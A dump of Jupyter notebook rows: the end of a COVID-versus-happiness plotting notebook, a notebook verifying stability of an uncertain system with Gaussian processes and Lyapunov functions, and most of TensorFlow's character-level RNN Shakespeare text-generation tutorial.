"x = data2['Healthy life expectancy']\ny = data2['max_infection_number']\nplt.figure()\nsns.scatterplot(x,(y))  # scatter plot\nplt.figure()\nsns.scatterplot(x,np.log(y))  # scatter plot of the log-scaled measure\nplt.figure()\nsns.regplot(x,np.log(y))",
"_____no_output_____"
]
],
[
[
"### Task 5.4: Plotting Freedom to make life choices vs maximum Infection rate",
"_____no_output_____"
]
],
[
[
"x = data2['Freedom to make life choices']\ny = data2['max_infection_number']\nplt.figure()\nsns.scatterplot(x,(y))  # scatter plot\nplt.figure()\nsns.scatterplot(x,np.log(y))  # scatter plot of the log-scaled measure\nplt.figure()\nsns.regplot(x,np.log(y))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2a21aeedc9f7e1893c4b05324253cdb2db58d5 | 9,701 | ipynb | Jupyter Notebook | experiments/1d_region_of_attraction_estimate.ipynb | xin-alice/cs159_safe_learning | 44761774c38cec36f156b2978b5eb5ec1ca712e9 | [
"MIT"
] | null | null | null | experiments/1d_region_of_attraction_estimate.ipynb | xin-alice/cs159_safe_learning | 44761774c38cec36f156b2978b5eb5ec1ca712e9 | [
"MIT"
] | null | null | null | experiments/1d_region_of_attraction_estimate.ipynb | xin-alice/cs159_safe_learning | 44761774c38cec36f156b2978b5eb5ec1ca712e9 | [
"MIT"
] | null | null | null | 30.127329 | 238 | 0.557881 | [
[
[
"# Stability verification of a fixed uncertain system (without dynamic programming)",
"_____no_output_____"
]
],
[
[
"from __future__ import division, print_function\n\nimport tensorflow as tf\nimport gpflow\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom future.builtins import *\nfrom functools import partial\n%matplotlib inline\n\nimport plotting\nimport safe_learning\n\ntry:\n session.close()\nexcept NameError:\n pass\n\ngraph = tf.Graph()\nsession = tf.InteractiveSession(graph=graph)\nsession.run(tf.global_variables_initializer())",
"_____no_output_____"
]
],
[
[
"We start by defining a discretization of the space $[-1, 1]$ with discretization constant $\\tau$",
"_____no_output_____"
]
],
[
[
"discretization = safe_learning.GridWorld([-1, 1], 1001)\ntau = 1 / discretization.nindex\n\nprint('Grid size: {0}'.format(discretization.nindex))",
"_____no_output_____"
]
],
[
[
"We define the GP model using one particular sample of the GP, in addition to a stable, closed-loop, linear model.\n$$x_{k+1} = 0.25 x_k + g_\\pi(x_k),$$\n\nThe prior dynamics are locally asymptotically stable. Moreover, in the one-dimensional case, the dynamics are stable as long as $|x_{k+1}| \\leq |x_{k}|$.",
"_____no_output_____"
]
],
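As a quick illustrative check, the mean dynamics alone, $x_{k+1} = 0.25\,x_k$, contract towards the origin, which is why the prior model is locally asymptotically stable; the GP term $g_\pi$ models the unknown deviation from this mean. A minimal sketch:

```python
# Iterate the mean dynamics x_{k+1} = 0.25 * x_k starting from x_0 = 1.0
x = 1.0
for k in range(5):
    x = 0.25 * x
    print(k + 1, x)  # 0.25, 0.0625, 0.015625, ... -> |x_k| shrinks geometrically
```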
[
[
"# Observation noise\nnoise_var = 0.01 ** 2\n\nwith tf.variable_scope('gp'):\n # Mean dynamics\n mean_function = safe_learning.LinearSystem((0.25, 0.), name='mean_dynamics')\n\n kernel = (gpflow.kernels.Matern32(1, lengthscales=1, variance=0.4**2, active_dims=[0])\n * gpflow.kernels.Linear(1, active_dims=[0]))\n\n gp = safe_learning.GPRCached(np.empty((0, 2), dtype=safe_learning.config.np_dtype),\n np.empty((0, 1), dtype=safe_learning.config.np_dtype),\n kernel,\n mean_function=mean_function)\n gp.likelihood.variance = noise_var\n\n gpfun = safe_learning.GaussianProcess(gp, name='gp_dynamics')",
"_____no_output_____"
],
[
"# Define one sample as the true dynamics\nnp.random.seed(5)\n\n# # Set up a discretization\nsample_disc = np.hstack((np.linspace(-1, 1, 50)[:, None],\n np.zeros((50, 1))))\n\n# # Draw samples\nfs = safe_learning.sample_gp_function(sample_disc, gpfun, number=10, return_function=False)\nplt.plot(sample_disc[:, 0], fs.T)\n\nplt.ylabel('$g(x)$')\nplt.xlabel('x')\nplt.title('Samples drawn from the GP model of the dynamics')\nplt.show()\n\n\ntrue_dynamics = safe_learning.sample_gp_function(\n sample_disc,\n gpfun)[0]\n\n# Plot the basic model\nwith tf.variable_scope('plot_true_dynamics'):\n true_y = true_dynamics(sample_disc, noise=False).eval(feed_dict=true_dynamics.feed_dict)\nplt.plot(sample_disc[:, 0], true_y, color='black', alpha=0.8)\nplt.title('GP model of the dynamics')\nplt.show()",
"_____no_output_____"
],
[
"# lyapunov_function = safe_learning.QuadraticFunction(np.array([[1]]))\nlyapunov_disc = safe_learning.GridWorld([-1., 1.], 3)\nlyapunov_function = safe_learning.Triangulation(lyapunov_disc, [1, 0, 1], name='lyapunov_function')\n\ndynamics = gpfun\npolicy = safe_learning.LinearSystem(np.array([0.]), name='policy')\n\n# Lipschitz constant\n# L_dyn = 0.25 + dynamics.beta(0) * np.sqrt(gp.kern.Mat32.variance) / gp.kern.Mat32.lengthscale * np.max(np.abs(extent))\n# L_V = np.max(lyapunov_function.gradient(grid))\n\nL_dyn = 0.25\nL_V = 1.\n\nlyapunov = safe_learning.Lyapunov(discretization, lyapunov_function, dynamics, L_dyn, L_V, tau, policy)\n\n# Specify the desired accuracy\n# accuracy = np.max(lyapunov.V) / 1e10",
"_____no_output_____"
]
],
[
[
"## Safety based on GP model\n\nLet's start by plotting the prior over the dynamics and the associated prior over $\\dot{V}(x)$.",
"_____no_output_____"
]
],
[
[
"lyapunov.update_safe_set()\nplotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=True)",
"_____no_output_____"
]
],
[
[
"Clearly the model does not allow us to classify any states as safe ($\\dot{V} < -L \\tau$). However, as a starting point, we assume that we know that the system is asymptotically stable within some initial set, $\\mathcal{S}_0$:\n\n$$\\mathcal{S}_0 = \\{ x \\in \\mathbb{R} \\,|\\, |x| < 0.2 \\}$$",
"_____no_output_____"
]
],
[
[
"lyapunov.initial_safe_set = np.abs(lyapunov.discretization.all_points.squeeze()) < 0.2",
"_____no_output_____"
]
],
[
[
"## Online learning\nAs we sample within this initial safe set, we gain more knowledge about the system. In particular, we iteratively select the state within the safe set, $\\mathcal{S}_n$, where the dynamics are the most uncertain (highest variance).",
"_____no_output_____"
]
],
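A small sketch of this selection rule with made-up numbers (the actual code below evaluates the GP's predictive standard deviation over the current safe set):

```python
import numpy as np

# Hypothetical safe states and the model's predictive std at each of them
safe_states = np.array([-0.15, -0.05, 0.0, 0.05, 0.15])
predictive_std = np.array([0.08, 0.02, 0.01, 0.03, 0.09])

most_uncertain = safe_states[np.argmax(predictive_std)]
print(most_uncertain)  # 0.15 -> the state to sample next
```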
[
[
"grid = lyapunov.discretization.all_points\nlyapunov.update_safe_set()\n\nwith tf.variable_scope('sample_new_safe_point'):\n safe_set = tf.placeholder(safe_learning.config.dtype, [None, None])\n _, dynamics_std_tf = lyapunov.dynamics(safe_set, lyapunov.policy(safe_set))\n \n \n tf_max_state = tf.placeholder(safe_learning.config.dtype, [1, None])\n tf_max_action = lyapunov.policy(tf_max_state)\n tf_measurement = true_dynamics(tf_max_state, tf_max_action)\n \nfeed_dict = lyapunov.dynamics.feed_dict\n \ndef update_gp():\n \"\"\"Update the GP model based on an actively selected data point.\"\"\"\n # Maximum uncertainty in safe set\n safe_grid = grid[lyapunov.safe_set]\n \n feed_dict[safe_set] = safe_grid\n dynamics_std = dynamics_std_tf.eval(feed_dict=feed_dict)\n \n max_id = np.argmax(dynamics_std)\n max_state = safe_grid[[max_id], :].copy()\n \n feed_dict[tf_max_state] = max_state\n max_action, measurement = session.run([tf_max_action, tf_measurement],\n feed_dict=feed_dict)\n \n arg = np.hstack((max_state, max_action))\n lyapunov.dynamics.add_data_point(arg, measurement)\n lyapunov.update_safe_set()",
"_____no_output_____"
],
[
"# Update the GP model a couple of times\nfor i in range(4):\n update_gp()",
"_____no_output_____"
],
[
"# Plot the new safe set\nplotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=True)",
"_____no_output_____"
]
],
[
[
"We continue to sample like this, until we find the maximum safe set",
"_____no_output_____"
]
],
[
[
"for i in range(20):\n update_gp()\n\nlyapunov.update_safe_set()\nplotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=False)",
"_____no_output_____"
],
[
"plotting.show_graph(tf.get_default_graph())",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2a36c7e49d3b9a5aaf4f8249e9074a8d69d167 | 44,246 | ipynb | Jupyter Notebook | site/en/tutorials/text/text_generation.ipynb | mustafabozkaya/docs-1 | 1b1a0ad689fe9c204cfd614f91cf5c6199611fd6 | [
"Apache-2.0"
] | 7 | 2021-05-08T18:25:43.000Z | 2021-09-30T13:41:26.000Z | site/en/tutorials/text/text_generation.ipynb | mustafabozkaya/docs-1 | 1b1a0ad689fe9c204cfd614f91cf5c6199611fd6 | [
"Apache-2.0"
] | null | null | null | site/en/tutorials/text/text_generation.ipynb | mustafabozkaya/docs-1 | 1b1a0ad689fe9c204cfd614f91cf5c6199611fd6 | [
"Apache-2.0"
] | 2 | 2021-05-08T18:53:53.000Z | 2021-05-08T19:32:30.000Z | 31.740316 | 494 | 0.529268 | [
[
[
"##### Copyright 2019 The TensorFlow Authors.",
"_____no_output_____"
]
],
[
[
"#@title Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.",
"_____no_output_____"
]
],
[
[
"# Text generation with an RNN",
"_____no_output_____"
],
[
"<table class=\"tfo-notebook-buttons\" align=\"left\">\n <td>\n <a target=\"_blank\" href=\"https://www.tensorflow.org/tutorials/text/text_generation\"><img src=\"https://www.tensorflow.org/images/tf_logo_32px.png\" />View on TensorFlow.org</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb\"><img src=\"https://www.tensorflow.org/images/colab_logo_32px.png\" />Run in Google Colab</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://github.com/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb\"><img src=\"https://www.tensorflow.org/images/GitHub-Mark-32px.png\" />View source on GitHub</a>\n </td>\n <td>\n <a href=\"https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/text/text_generation.ipynb\"><img src=\"https://www.tensorflow.org/images/download_logo_32px.png\" />Download notebook</a>\n </td>\n</table>",
"_____no_output_____"
],
[
"This tutorial demonstrates how to generate text using a character-based RNN. You will work with a dataset of Shakespeare's writing from Andrej Karpathy's [The Unreasonable Effectiveness of Recurrent Neural Networks](http://karpathy.github.io/2015/05/21/rnn-effectiveness/). Given a sequence of characters from this data (\"Shakespear\"), train a model to predict the next character in the sequence (\"e\"). Longer sequences of text can be generated by calling the model repeatedly.\n\nNote: Enable GPU acceleration to execute this notebook faster. In Colab: *Runtime > Change runtime type > Hardware accelerator > GPU*.\n\nThis tutorial includes runnable code implemented using [tf.keras](https://www.tensorflow.org/programmers_guide/keras) and [eager execution](https://www.tensorflow.org/programmers_guide/eager). The following is sample output when the model in this tutorial trained for 30 epochs, and started with the prompt \"Q\":",
"_____no_output_____"
],
[
"<pre>\nQUEENE:\nI had thought thou hadst a Roman; for the oracle,\nThus by All bids the man against the word,\nWhich are so weak of care, by old care done;\nYour children were in your holy love,\nAnd the precipitation through the bleeding throne.\n\nBISHOP OF ELY:\nMarry, and will, my lord, to weep in such a one were prettiest;\nYet now I was adopted heir\nOf the world's lamentable day,\nTo watch the next way with his father with his face?\n\nESCALUS:\nThe cause why then we are all resolved more sons.\n\nVOLUMNIA:\nO, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, it is no sin it should be dead,\nAnd love and pale as any will to that word.\n\nQUEEN ELIZABETH:\nBut how long have I heard the soul for this world,\nAnd show his hands of life be proved to stand.\n\nPETRUCHIO:\nI say he look'd on, if I must be content\nTo stay him from the fatal of our country's bliss.\nHis lordship pluck'd from this sentence then for prey,\nAnd then let us twain, being the moon,\nwere she such a case as fills m\n</pre>",
"_____no_output_____"
],
[
"While some of the sentences are grammatical, most do not make sense. The model has not learned the meaning of words, but consider:\n\n* The model is character-based. When training started, the model did not know how to spell an English word, or that words were even a unit of text.\n\n* The structure of the output resembles a play—blocks of text generally begin with a speaker name, in all capital letters similar to the dataset.\n\n* As demonstrated below, the model is trained on small batches of text (100 characters each), and is still able to generate a longer sequence of text with coherent structure.",
"_____no_output_____"
],
[
"## Setup",
"_____no_output_____"
],
[
"### Import TensorFlow and other libraries",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf\nfrom tensorflow.keras.layers.experimental import preprocessing\n\nimport numpy as np\nimport os\nimport time",
"_____no_output_____"
]
],
[
[
"### Download the Shakespeare dataset\n\nChange the following line to run this code on your own data.",
"_____no_output_____"
]
],
[
[
"path_to_file = tf.keras.utils.get_file('shakespeare.txt', 'https://storage.googleapis.com/download.tensorflow.org/data/shakespeare.txt')",
"_____no_output_____"
]
],
[
[
"### Read the data\n\nFirst, look in the text:",
"_____no_output_____"
]
],
[
[
"# Read, then decode for py2 compat.\ntext = open(path_to_file, 'rb').read().decode(encoding='utf-8')\n# length of text is the number of characters in it\nprint('Length of text: {} characters'.format(len(text)))",
"_____no_output_____"
],
[
"# Take a look at the first 250 characters in text\nprint(text[:250])",
"_____no_output_____"
],
[
"# The unique characters in the file\nvocab = sorted(set(text))\nprint('{} unique characters'.format(len(vocab)))",
"_____no_output_____"
]
],
[
[
"## Process the text",
"_____no_output_____"
],
[
"### Vectorize the text\n\nBefore training, you need to convert the strings to a numerical representation. \n\nThe `preprocessing.StringLookup` layer can convert each character into a numeric ID. It just needs the text to be split into tokens first.",
"_____no_output_____"
]
],
[
[
"example_texts = ['abcdefg', 'xyz']\n\nchars = tf.strings.unicode_split(example_texts, input_encoding='UTF-8')\nchars",
"_____no_output_____"
]
],
[
[
"Now create the `preprocessing.StringLookup` layer:",
"_____no_output_____"
]
],
[
[
"ids_from_chars = preprocessing.StringLookup(\n vocabulary=list(vocab))",
"_____no_output_____"
]
],
[
[
"It converts from tokens to character IDs, padding with `0`:",
"_____no_output_____"
]
],
[
[
"ids = ids_from_chars(chars)\nids",
"_____no_output_____"
]
],
[
[
"Since the goal of this tutorial is to generate text, it will also be important to invert this representation and recover human-readable strings from it. For this you can use `preprocessing.StringLookup(..., invert=True)`. ",
"_____no_output_____"
],
[
"Note: Here instead of passing the original vocabulary generated with `sorted(set(text))` use the `get_vocabulary()` method of the `preprocessing.StringLookup` layer so that the padding and `[UNK]` tokens are set the same way.",
"_____no_output_____"
]
],
[
[
"chars_from_ids = tf.keras.layers.experimental.preprocessing.StringLookup(\n vocabulary=ids_from_chars.get_vocabulary(), invert=True)",
"_____no_output_____"
]
],
[
[
"This layer recovers the characters from the vectors of IDs, and returns them as a `tf.RaggedTensor` of characters:",
"_____no_output_____"
]
],
[
[
"chars = chars_from_ids(ids)\nchars",
"_____no_output_____"
]
],
[
[
"You can use `tf.strings.reduce_join` to join the characters back into strings. ",
"_____no_output_____"
]
],
[
[
"tf.strings.reduce_join(chars, axis=-1).numpy()",
"_____no_output_____"
],
[
"def text_from_ids(ids):\n return tf.strings.reduce_join(chars_from_ids(ids), axis=-1)",
"_____no_output_____"
]
],
[
[
"### The prediction task",
"_____no_output_____"
],
[
"Given a character, or a sequence of characters, what is the most probable next character? This is the task you're training the model to perform. The input to the model will be a sequence of characters, and you train the model to predict the output—the following character at each time step.\n\nSince RNNs maintain an internal state that depends on the previously seen elements, given all the characters computed until this moment, what is the next character?\n",
"_____no_output_____"
],
[
"### Create training examples and targets\n\nNext divide the text into example sequences. Each input sequence will contain `seq_length` characters from the text.\n\nFor each input sequence, the corresponding targets contain the same length of text, except shifted one character to the right.\n\nSo break the text into chunks of `seq_length+1`. For example, say `seq_length` is 4 and our text is \"Hello\". The input sequence would be \"Hell\", and the target sequence \"ello\".\n\nTo do this first use the `tf.data.Dataset.from_tensor_slices` function to convert the text vector into a stream of character indices.",
"_____no_output_____"
]
],
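The "Hello" example above, written out in plain Python as a minimal sketch; the pipeline below performs the same split on tensors of character IDs.

```python
text_chunk = "Hello"          # a chunk of seq_length + 1 characters
input_seq = text_chunk[:-1]   # "Hell"
target_seq = text_chunk[1:]   # "ello"
print(input_seq, target_seq)
```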
[
[
"all_ids = ids_from_chars(tf.strings.unicode_split(text, 'UTF-8'))\nall_ids",
"_____no_output_____"
],
[
"ids_dataset = tf.data.Dataset.from_tensor_slices(all_ids)",
"_____no_output_____"
],
[
"for ids in ids_dataset.take(10):\n print(chars_from_ids(ids).numpy().decode('utf-8'))",
"_____no_output_____"
],
[
"seq_length = 100\nexamples_per_epoch = len(text)//(seq_length+1)",
"_____no_output_____"
]
],
[
[
"The `batch` method lets you easily convert these individual characters to sequences of the desired size.",
"_____no_output_____"
]
],
[
[
"sequences = ids_dataset.batch(seq_length+1, drop_remainder=True)\n\nfor seq in sequences.take(1):\n print(chars_from_ids(seq))",
"_____no_output_____"
]
],
[
[
"It's easier to see what this is doing if you join the tokens back into strings:",
"_____no_output_____"
]
],
[
[
"for seq in sequences.take(5):\n print(text_from_ids(seq).numpy())",
"_____no_output_____"
]
],
[
[
"For training you'll need a dataset of `(input, label)` pairs, where `input` and \n`label` are sequences. At each time step the input is the current character and the label is the next character. \n\nHere's a function that takes a sequence as input, duplicates it, and shifts it to align the input and label for each timestep:",
"_____no_output_____"
]
],
[
[
"def split_input_target(sequence):\n input_text = sequence[:-1]\n target_text = sequence[1:]\n return input_text, target_text",
"_____no_output_____"
],
[
"split_input_target(list(\"Tensorflow\"))",
"_____no_output_____"
],
[
"dataset = sequences.map(split_input_target)",
"_____no_output_____"
],
[
"for input_example, target_example in dataset.take(1):\n print(\"Input :\", text_from_ids(input_example).numpy())\n print(\"Target:\", text_from_ids(target_example).numpy())",
"_____no_output_____"
]
],
[
[
"### Create training batches\n\nYou used `tf.data` to split the text into manageable sequences. But before feeding this data into the model, you need to shuffle the data and pack it into batches.",
"_____no_output_____"
]
],
[
[
"# Batch size\nBATCH_SIZE = 64\n\n# Buffer size to shuffle the dataset\n# (TF data is designed to work with possibly infinite sequences,\n# so it doesn't attempt to shuffle the entire sequence in memory. Instead,\n# it maintains a buffer in which it shuffles elements).\nBUFFER_SIZE = 10000\n\ndataset = (\n dataset\n .shuffle(BUFFER_SIZE)\n .batch(BATCH_SIZE, drop_remainder=True)\n .prefetch(tf.data.experimental.AUTOTUNE))\n\ndataset",
"_____no_output_____"
]
],
[
[
"## Build The Model",
"_____no_output_____"
],
[
"This section defines the model as a `keras.Model` subclass (For details see [Making new Layers and Models via subclassing](https://www.tensorflow.org/guide/keras/custom_layers_and_models)). \n\nThis model has three layers:\n\n* `tf.keras.layers.Embedding`: The input layer. A trainable lookup table that will map each character-ID to a vector with `embedding_dim` dimensions;\n* `tf.keras.layers.GRU`: A type of RNN with size `units=rnn_units` (You can also use an LSTM layer here.)\n* `tf.keras.layers.Dense`: The output layer, with `vocab_size` outputs. It outputs one logit for each character in the vocabulary. These are the log-likelihoods of each character according to the model.",
"_____no_output_____"
]
],
[
[
"# Length of the vocabulary in chars\nvocab_size = len(vocab)\n\n# The embedding dimension\nembedding_dim = 256\n\n# Number of RNN units\nrnn_units = 1024",
"_____no_output_____"
],
[
"class MyModel(tf.keras.Model):\n def __init__(self, vocab_size, embedding_dim, rnn_units):\n super().__init__(self)\n self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)\n self.gru = tf.keras.layers.GRU(rnn_units,\n return_sequences=True, \n return_state=True)\n self.dense = tf.keras.layers.Dense(vocab_size)\n\n def call(self, inputs, states=None, return_state=False, training=False):\n x = inputs\n x = self.embedding(x, training=training)\n if states is None:\n states = self.gru.get_initial_state(x)\n x, states = self.gru(x, initial_state=states, training=training)\n x = self.dense(x, training=training)\n\n if return_state:\n return x, states\n else: \n return x",
"_____no_output_____"
],
[
"model = MyModel(\n # Be sure the vocabulary size matches the `StringLookup` layers.\n vocab_size=len(ids_from_chars.get_vocabulary()),\n embedding_dim=embedding_dim,\n rnn_units=rnn_units)",
"_____no_output_____"
]
],
[
[
"For each character the model looks up the embedding, runs the GRU one timestep with the embedding as input, and applies the dense layer to generate logits predicting the log-likelihood of the next character:\n\n",
"_____no_output_____"
],
[
"Note: For training you could use a `keras.Sequential` model here. To generate text later you'll need to manage the RNN's internal state. It's simpler to include the state input and output options upfront than it is to rearrange the model architecture later. For more details see the [Keras RNN guide](https://www.tensorflow.org/guide/keras/rnn#rnn_state_reuse).",
"_____no_output_____"
],
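For reference, a sketch of the `keras.Sequential` alternative mentioned in the note; it is sufficient for training but does not expose the RNN state needed for generation later. It assumes `ids_from_chars`, `embedding_dim` and `rnn_units` are defined as in the surrounding cells.

```python
sequential_model = tf.keras.Sequential([
    tf.keras.layers.Embedding(len(ids_from_chars.get_vocabulary()), embedding_dim),
    tf.keras.layers.GRU(rnn_units, return_sequences=True),
    tf.keras.layers.Dense(len(ids_from_chars.get_vocabulary())),
])
```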
[
"## Try the model\n\nNow run the model to see that it behaves as expected.\n\nFirst check the shape of the output:",
"_____no_output_____"
]
],
[
[
"for input_example_batch, target_example_batch in dataset.take(1):\n example_batch_predictions = model(input_example_batch)\n print(example_batch_predictions.shape, \"# (batch_size, sequence_length, vocab_size)\")",
"_____no_output_____"
]
],
[
[
"In the above example the sequence length of the input is `100` but the model can be run on inputs of any length:",
"_____no_output_____"
]
],
[
[
"model.summary()",
"_____no_output_____"
]
],
[
[
"To get actual predictions from the model you need to sample from the output distribution, to get actual character indices. This distribution is defined by the logits over the character vocabulary.\n\nNote: It is important to _sample_ from this distribution as taking the _argmax_ of the distribution can easily get the model stuck in a loop.\n\nTry it for the first example in the batch:",
"_____no_output_____"
]
],
[
[
"sampled_indices = tf.random.categorical(example_batch_predictions[0], num_samples=1)\nsampled_indices = tf.squeeze(sampled_indices,axis=-1).numpy()",
"_____no_output_____"
]
],
[
[
"This gives us, at each timestep, a prediction of the next character index:",
"_____no_output_____"
]
],
[
[
"sampled_indices",
"_____no_output_____"
]
],
[
[
"Decode these to see the text predicted by this untrained model:",
"_____no_output_____"
]
],
[
[
"print(\"Input:\\n\", text_from_ids(input_example_batch[0]).numpy())\nprint()\nprint(\"Next Char Predictions:\\n\", text_from_ids(sampled_indices).numpy())",
"_____no_output_____"
]
],
[
[
"## Train the model",
"_____no_output_____"
],
[
"At this point the problem can be treated as a standard classification problem. Given the previous RNN state, and the input this time step, predict the class of the next character.",
"_____no_output_____"
],
[
"### Attach an optimizer, and a loss function",
"_____no_output_____"
],
[
"The standard `tf.keras.losses.sparse_categorical_crossentropy` loss function works in this case because it is applied across the last dimension of the predictions.\n\nBecause your model returns logits, you need to set the `from_logits` flag.\n",
"_____no_output_____"
]
],
[
[
"loss = tf.losses.SparseCategoricalCrossentropy(from_logits=True)",
"_____no_output_____"
],
[
"example_batch_loss = loss(target_example_batch, example_batch_predictions)\nmean_loss = example_batch_loss.numpy().mean()\nprint(\"Prediction shape: \", example_batch_predictions.shape, \" # (batch_size, sequence_length, vocab_size)\")\nprint(\"Mean loss: \", mean_loss)",
"_____no_output_____"
]
],
[
[
"A newly initialized model shouldn't be too sure of itself, the output logits should all have similar magnitudes. To confirm this you can check that the exponential of the mean loss is approximately equal to the vocabulary size. A much higher loss means the model is sure of its wrong answers, and is badly initialized:",
"_____no_output_____"
]
],
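Why this check works (a short illustration with a made-up vocabulary size): a maximally uncertain model assigns probability $1/V$ to the correct character, so its cross-entropy is $\ln(V)$ and exponentiating the loss recovers $V$.

```python
import numpy as np

V = 66                            # hypothetical vocabulary size
loss_uniform = -np.log(1.0 / V)   # cross-entropy of a uniform prediction
print(np.exp(loss_uniform))       # ~66.0, i.e. the vocabulary size
```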
[
[
"tf.exp(mean_loss).numpy()",
"_____no_output_____"
]
],
[
[
"Configure the training procedure using the `tf.keras.Model.compile` method. Use `tf.keras.optimizers.Adam` with default arguments and the loss function.",
"_____no_output_____"
]
],
[
[
"model.compile(optimizer='adam', loss=loss)",
"_____no_output_____"
]
],
[
[
"### Configure checkpoints",
"_____no_output_____"
],
[
"Use a `tf.keras.callbacks.ModelCheckpoint` to ensure that checkpoints are saved during training:",
"_____no_output_____"
]
],
[
[
"# Directory where the checkpoints will be saved\ncheckpoint_dir = './training_checkpoints'\n# Name of the checkpoint files\ncheckpoint_prefix = os.path.join(checkpoint_dir, \"ckpt_{epoch}\")\n\ncheckpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_prefix,\n save_weights_only=True)",
"_____no_output_____"
]
],
[
[
"### Execute the training",
"_____no_output_____"
],
[
"To keep training time reasonable, use 20 epochs to train the model. In Colab, set the runtime to GPU for faster training.",
"_____no_output_____"
]
],
[
[
"EPOCHS = 20",
"_____no_output_____"
],
[
"history = model.fit(dataset, epochs=EPOCHS, callbacks=[checkpoint_callback])",
"_____no_output_____"
]
],
[
[
"## Generate text",
"_____no_output_____"
],
[
"The simplest way to generate text with this model is to run it in a loop, and keep track of the model's internal state as you execute it.\n\n\n\nEach time you call the model you pass in some text and an internal state. The model returns a prediction for the next character and its new state. Pass the prediction and state back in to continue generating text.\n",
"_____no_output_____"
],
[
"The following makes a single step prediction:",
"_____no_output_____"
]
],
[
[
"class OneStep(tf.keras.Model):\n def __init__(self, model, chars_from_ids, ids_from_chars, temperature=1.0):\n super().__init__()\n self.temperature=temperature\n self.model = model\n self.chars_from_ids = chars_from_ids\n self.ids_from_chars = ids_from_chars\n\n # Create a mask to prevent \"\" or \"[UNK]\" from being generated.\n skip_ids = self.ids_from_chars(['','[UNK]'])[:, None]\n sparse_mask = tf.SparseTensor(\n # Put a -inf at each bad index.\n values=[-float('inf')]*len(skip_ids),\n indices = skip_ids,\n # Match the shape to the vocabulary\n dense_shape=[len(ids_from_chars.get_vocabulary())]) \n self.prediction_mask = tf.sparse.to_dense(sparse_mask)\n\n @tf.function\n def generate_one_step(self, inputs, states=None):\n # Convert strings to token IDs.\n input_chars = tf.strings.unicode_split(inputs, 'UTF-8')\n input_ids = self.ids_from_chars(input_chars).to_tensor()\n\n # Run the model.\n # predicted_logits.shape is [batch, char, next_char_logits] \n predicted_logits, states = self.model(inputs=input_ids, states=states, \n return_state=True)\n # Only use the last prediction.\n predicted_logits = predicted_logits[:, -1, :]\n predicted_logits = predicted_logits/self.temperature\n # Apply the prediction mask: prevent \"\" or \"[UNK]\" from being generated.\n predicted_logits = predicted_logits + self.prediction_mask\n\n # Sample the output logits to generate token IDs.\n predicted_ids = tf.random.categorical(predicted_logits, num_samples=1)\n predicted_ids = tf.squeeze(predicted_ids, axis=-1)\n \n # Convert from token ids to characters\n predicted_chars = self.chars_from_ids(predicted_ids)\n\n # Return the characters and model state.\n return predicted_chars, states",
"_____no_output_____"
],
[
"one_step_model = OneStep(model, chars_from_ids, ids_from_chars)",
"_____no_output_____"
]
],
[
[
"Run it in a loop to generate some text. Looking at the generated text, you'll see the model knows when to capitalize, make paragraphs and imitates a Shakespeare-like writing vocabulary. With the small number of training epochs, it has not yet learned to form coherent sentences.",
"_____no_output_____"
]
],
[
[
"start = time.time()\nstates = None\nnext_char = tf.constant(['ROMEO:'])\nresult = [next_char]\n\nfor n in range(1000):\n next_char, states = one_step_model.generate_one_step(next_char, states=states)\n result.append(next_char)\n\nresult = tf.strings.join(result)\nend = time.time()\n\nprint(result[0].numpy().decode('utf-8'), '\\n\\n' + '_'*80)\n\nprint(f\"\\nRun time: {end - start}\")",
"_____no_output_____"
]
],
[
[
